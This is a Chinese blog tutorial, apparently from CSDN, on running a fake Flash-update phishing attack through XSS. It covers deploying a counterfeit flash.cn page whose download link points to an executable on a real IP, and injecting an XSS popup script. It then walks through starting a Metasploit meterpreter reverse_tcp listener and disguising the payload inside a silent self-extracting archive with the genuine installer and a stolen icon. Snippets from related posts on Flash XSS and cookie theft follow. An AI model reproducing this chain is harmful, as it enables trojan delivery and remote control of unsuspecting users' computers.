XSS-Flash攻击钓⻥

已于 2024-07-23 18:10:45 修改
阅读量293 收藏 10
点赞数 4
文章标签: xss 前端
于 2024-07-23 18:06:18 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_53198216/article/details/140642621
版权

1.在本机phpstudy中开启web服务

2.下载以下项⽬并将其源码⽂件部署在⽹站根⽬录下...稍作修改并访问..

https://github.com/r00tSe7en/Fake-flash.cn # 旧版
https://github.com/crow821/crowsec/tree/master/crowsec_FakeFlash # 新版
修改index.html
<div id="ic-download">
<span> ⽴即下载 </span>
<a href="http://101.42.118.221/test.exe" target="_self"> ⽴即下载
</a>
</div> // 点击以下⻚⾯中的 " ⽴即下载 " 会将如上的 test.exe 下载到本地!

3.来到xss平台 点击公共模块---flash弹窗钓⻥-查看 将其中的代码保存成⼀个js⽂件放到我们⽹

站的根⽬录下⾯
4. 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站(本机IP)
5. 进⼀步对提供下载的Flash⽂件进⾏伪装...在真的Flash官⽹下载安装程序并使⽤MSF⽣成⼀个⽊
使用kali的MSF生成Payload,在桌面上生成shell.exe文件
#开启监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.1.7
set lport 4444
run

6.将官网下载的flash安装包和本地的shell.exe打包压缩文件名为“xxx.exe”,点击"⾼级"标签⻚下的"⾃解压选项"填写解压路径为 C:\Windows\Temp

7.点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"

C:\Windows\Temp\shell.exe
C:\Windows\Temp\flashcenter_pp_ax_install_cn.exe
8.在更新下选择解压并更新文件和覆盖所有文件

9.使⽤ ResourceHacker 修改图标,下载安装;通过ResourceHacker打开原版的flash安

装程序,点击 Icon Group ⽂件夹中的⽂件,⿏标右键"保存*.ico资源",即可导出ico图标
点击第一行,保存flash图标文件,再将压缩包拖入点击Replace,选择保存的图标文件进行替换
10. 模拟受害者的流程 最终获取到受害者⽹站控制权
狂小霖
关注
UXSS+FlashXSS+PDFXSS
xiaoheizi的博客
06-29 385
白盒中可以把swf文件反编译后直接搜ExternalInterface.call,找到之后看是否有参数传递,如果有我们就可以控制参数的输入输出。直接访问构造的payload:/res/js/dev/util_libs/jPlayer/Jplayer.swf?漏洞产生:UXSS是利用浏览器或者浏览器扩展漏洞来制造产生XSS并执行代码的一种攻击类型。在使用edge浏览器访问带有xss脚本的内容时,xss脚本会被过滤。浏览器访问直链地址触发xss,火狐浏览器访问无法触发弹窗。1、创建PDF,加入动作JS。
XSS-窃取Cookie及拓展
2301_76631050的博客
07-23 1965
步骤一:来到xss平台 点击公共模块---flash弹窗-查看将其中的代码保存成⼀个js⽂件放到我们⽹站的根⽬录下⾯。步骤二:用记事本打开1.js 修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。步骤七:点击"设置"--"解压后运⾏"如下两⾏内容...并在"模式"标签下设置"全部隐藏"...步骤⼋:配置更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!步骤二:在我的项目中选择我们刚创建的项目,点击右上角的查看配置代码。把文件复制到我们网站的根目录下。
XSS Flash
cheapkiller的博客
07-23 379
2.来到xss平台 点击公共模块---flash弹窗-查看 将其中的代码保存成⼀个js⽂件放到我们⽹。6.将两个⽂件⼀块压缩并更改⽂件名为"Download.exe",点击"⾼级"标签⻚下的"⾃解压选项"填。1.在phpstudy中部署web环境并将源码文件部署在网站根目录下然后修改内容并访问。4.修改js中的这⼀⾏代码,改成我们伪造的flash⽹站⽹址。5.打开kali虚拟机使用MSF在真的flash生成一个木马。写解压路径为 C:\Windows\Temp。进行项目前先打开xss平台进行注册登录。
14. Flash Xss入门 [navigateToURL]
→_→
05-18 451
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net --------------------------------------------------------------------------------- 简要描述: 接下来,我们将讲解FlashXss。由于乌云及社会各界的白帽子的上报,腾讯目前已经对绝大多数可能存在问题的Flash进行了修复。使得我在寻找真实案例时着实麻烦了不少。但是为了使得本教程足够完善和系统,我还是很艰难的找出了一些可以参考的例
Flash XSS 学习整理
baynk的博客
11-24 1180
0x00 Flash XSS 本来想放弃的,问了大佬,还是说可以研究下。。。所以硬着头皮来弄了。 什么是flash xssxss一是指执行恶意js,那flash xss呢?是因为flash有可以调用js的函数,也就是可以和js通信,因此这些函数如果使用不当就会造成flash xss。 常见的可触发xss的危险函数有:getURL,navigateToURL,ExternalInterface....
Xss——Flash
weixin_56291508的博客
04-22 876
Xss——Flash
XSS -攻击防御手册.pdf
07-26
#### 七、进行Flash攻击 尽管HTML5已逐渐取代Flash,但在Flash仍然被广泛使用的时期,攻击者可以通过创建恶意的Flash对象来触发XSS攻击。这通常涉及到利用Flash的脚本接口,使浏览器执行不受信任的代码。 #### 八...
WEB 攻防-通用漏-XSS 跨站脚本攻击-反射型/存储型/DOM&BEEF-XSS
weixin_45534587的博客
01-12 1289
XSS攻击,全称为跨站脚本攻击,是指攻击者通过在网页中插入恶意脚本代码,当用户浏览该网页时,恶意脚本会被执行,从而达到攻击目的的一种安全漏洞。这些恶意脚本可以窃取用户的敏感信息,如Cookie、会话令牌等,或者诱导用户执行不安全的操作,如点击恶意链接、下载恶意软件等。
WEB攻防-通用漏洞_XSS跨站_权限维持_捆绑鱼_浏览器漏洞
最新发布
weixin_45534587的博客
01-14 1062
构造代码: 把代码放在自己网站上,比如,我的博客上(或者本地网站上)的test.html,只要对方访问192.168.199.1:8081/web/test.html,在beef就可以看到对方上线,② 模仿flash下载官方地址(https://www.flash.cn/ )做出本地页面:http://127.0.0.1:8081/ (构造一个相似域名的网址,更逼真)
Web安全--XSS跨站脚本攻击
weixin_68243135的博客
11-28 803
Web安全,xss攻击利用,以及绕过和防护措施。
15. Flash Xss进阶 [ExternalInterface.call第一个参数]
→_→
05-19 524
作者:心伤的瘦子 来自:PKAV技术宅社区 网址:http://www.pkav.net ---------------------------------------------------------------- 简要描述: 除了上一节讲到的navigateToURL/getURL之外呢,另一个经常存在XSS缺陷的as函数就是ExternalInterface.call,此函数作为FLASH与宿主页面javascript通信的接口,一般来说,有“2”个参数,第一个参数为所调用js函数名,后续
网络攻防|XSS Flash弹窗
weixin_42282189的博客
11-15 3131
作者: Overture 免责声明:本文仅供学习研究,严禁从事非法活动,任何后果由使用者本人负责。 0x00 前言 xss弹出flash更新是一种常见的鱼手法,本文介绍一下整体思路和部分技术细节。 注意:任何未经授权的渗透都是违法行为,本文仅用于技术讨论,切勿用于违法途径 前期准备 服务器及域名 flash页面 免杀木马 前提条件:目标网站存在存储型xss漏洞或者已经getshell能够修改源码,通过请求你插入的js代码触发flash升级弹窗,跳转到准备好的flash下载界面下载安装,触发木马上线cs.
XSS-Flash攻击
qq_66105152的博客
07-26 280
(1)MSF⽣成Payload,执行下面代码后会生成一个shell.exe文件。(3)将shell.exe拖到www目录下并修改为flash.exe。5.打开pikachu存储型xss下载flash.exe并运行。6.虚拟机得到主机控制权。
一些你可能不知道的Flash XSS技巧
weixin_34248023的博客
03-08 199
mramydnei · 2014/02/19 10:160x00 前言原文链接soroush.secproject.com/blog/2013/1…soroush.secproject.com/blog/2013/1…soroush.secproject.com/blog/2014/0…可能在你打开这个博客的时候会有一丝的熟悉感。对,这就是那个发现 FCK 2.6.8 ASP 版二次上传漏洞的人。...
Flash XSS漏洞快速上手
weixin_50464560的博客
07-29 1125
0x01 Flash XSS xss一是指执行恶意js,那么为什么说flash xss呢?是因为flash有可以调用js的函数,也就是可以和js通信,因此这些函数如果使用不当就会造成xss。常见的可触发xss的危险函数有:getURL,navigateToURL,ExternalInterface.call,htmlText,loadMovie等等 0x02 ExternalInterface.call举例 AS中ExternalInterface类是用来和js通信的,调用方法是用来调用js函数的,函数原型
XSS漏洞】XSS攻击平台-Flash攻击
muyuchen110的博客
07-23 925
XSS 攻击全称跨站脚本攻击,是为不和层叠样式表(Cascading Style Sheets, CSS) 的缩写混 淆,故将跨站脚本攻击缩写为 XSSXSS 是⼀种在 web 应⽤中的计算机安全漏洞,它允许恶意web⽤户将代码植⼊到 web ⽹站⾥⾯,供给其它⽤户访问,当⽤户访问到有恶意代码的⽹⻚就会产⽣ xss 攻击;同样的⽅法----ResourceHacker打开刚刚打包好的⽂件,点击Icon Group⽂件夹中的⽂。更新⽅式----》解压并更新⽂件⽽覆盖⽅式----覆盖所有⽂件!
053-WEB攻防-XSS跨站&SVG&PDF&Flash&MXSS&UXSS&配合上传&文件添加脚本
wushangyu32335的博客
03-11 2526
小迪安全2023笔记
#常见漏洞解析—XSS简介
2301_78006725的博客
09-16 208
3、DOM跨站(DOM XSS):DOM(document object model文档对象模型),客户端脚本处理逻辑导致的安全问题,客户端的脚本程序可以通过DOM动态地检查和修改页面内容,它不依赖于提交数据到服务器端,而从客户端获得DOM中的数据在本地执行,如果DOM中的数据没有经过严格确认,就会产生DOM XSS漏洞。1、存储型XSS:(持久型跨站)最直接的危害类型,跨站代码存储在服务器(数据库)中,每当有用户访问该页面的时候都会触发代码执行,这种XSS非常危险,容易造成蠕虫,大量盗窃cookie。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值